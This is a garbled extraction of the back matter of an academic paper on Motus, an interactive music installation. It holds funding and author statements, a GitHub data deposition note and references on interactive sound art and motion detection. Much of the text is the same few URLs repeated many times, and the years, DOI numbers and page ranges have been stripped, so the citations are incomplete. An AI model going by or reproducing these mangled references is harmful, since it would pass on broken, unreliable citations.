http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work has been funded by fapesp, under grant / - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: fapesp: / - . competing interests the author declares there is no competing interests. author contributions • tiago fernandes tavares conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data deposition the following information was supplied regarding the deposition of related data: the source code is available on github (https://github.com/tiagoft/motus). references birchfield d, phillips k, kidané a, lorig d. . interactive public sound art: a case study. in: proceedings of the international conference on new interfaces for musical expression (nime ). available at http://www.nime.org/proceedings/ /nime .pdf. chen s, maeda y, takahashi y. . melody oriented interactive chaotic sound generation system using music conductor gesture. in: ieee international conference on fuzzy systems (fuzz-ieee). piscataway: ieee, – . cope d. . techniques of the contemporary composer. new york: schirmer books. dubberly h, pangaro p, haque u. . on modeling: what is interaction? are there different types? interactions ( ): – doi . / . . garnett g. . the aesthetics of interactive computer music. computer music journal ( ): – doi . / . guisan ac. . interactive sound installation: intrium. in: proceedings of the international conference on new interfaces for musical expression (nime ). available at http://www.nime.org/ proceedings/ /nime .pdf. jung d, jensen mh, laing s, mayall j. . cycli: an interactive performance combining dance, graphics, music and kinect-technology. in: proceedings of the th international conference of the nz chapter of the acm’s special interest group on human–computer interaction chinz ’ . new york: acm, – . tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://dx.doi.org/ . / . http://dx.doi.org/ . / http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://dx.doi.org/ . /peerj-cs. kallblad a, friberg a, svensson k, edelholm es. . hoppsa universum—an interactive dance installation for children. in: proceedings of the international conference on new interfaces for musical expression (nime ). available at http://www.nime.org/proceedings/ /nime . pdf. kobori d, kagawa k, iida m, arakaua c. . line: interactive sound and light installation. in: proceedings of the international conference on new interfaces for musical expression (nime ). available at http://www.nime.org/proceedings/ /nime .pdf. moeslund tb. . introduction to video and image processing. berlin: springer. morales-manzanares r, morales e, dannenberg r, berger j. . sicib: an interactive music composition system using body movements. computer music journal ( ): – doi . / . morreale f, masu r, angeli ad. . robin: an algorithmic composer for interactive scenarios. in: proceedings of the sound and music computing conference , smc . available at http:// www.academia.edu/ /robin an algorithmic composer for interactive scenarios. pachet f. . the continuator: musical interaction with style. in: international computer music conference (icma). available at https://www.csl.sony.fr/downloads/papers/uploads/pachet- f. pdf. sanchez t, castro g. . aether—interactive audiovisual installation. available at vimeo.com/ (acessed july ). schacher jc. . action and perception in interactive sound installations: an ecological approach. in: proceedings of the international conference on new interfaces for musical expression (nime ). available at http://www.nime.org/proceedings/ /nime .pdf. schulze w, van der merwe b. . music generation with markov models. multimedia, ieee ( ): – doi . /mmul. . . seo j, corness g. . nite aura: an audiovisual interactive immersive installation. in: proceedings of the international conference on new interfaces for musical expression (nime ). available at http://www.nime.org/proceedings/ /nime .pdf. szeliski r. . computer vision: algorithms and applications. berlin: springer. thefuntheory. . piano stairs. available at www.thefuntheory.com/piano-staircase (accessed july ). wirayuda t, laksitowening k, sthevanie f, rismala r. . development methods for hybrid motion detection (frame difference-automatic threshold). in: international conference of information and communication technology (icoict). piscataway: ieee, – . tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://dx.doi.org/ . / http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios http://www.academia.edu/ /robin_an_algorithmic_composer_for_interactive_scenarios https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf https://www.csl.sony.fr/downloads/papers/uploads/pachet- f.pdf http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://vimeo.com/ http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://dx.doi.org/ . /mmul. . http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf 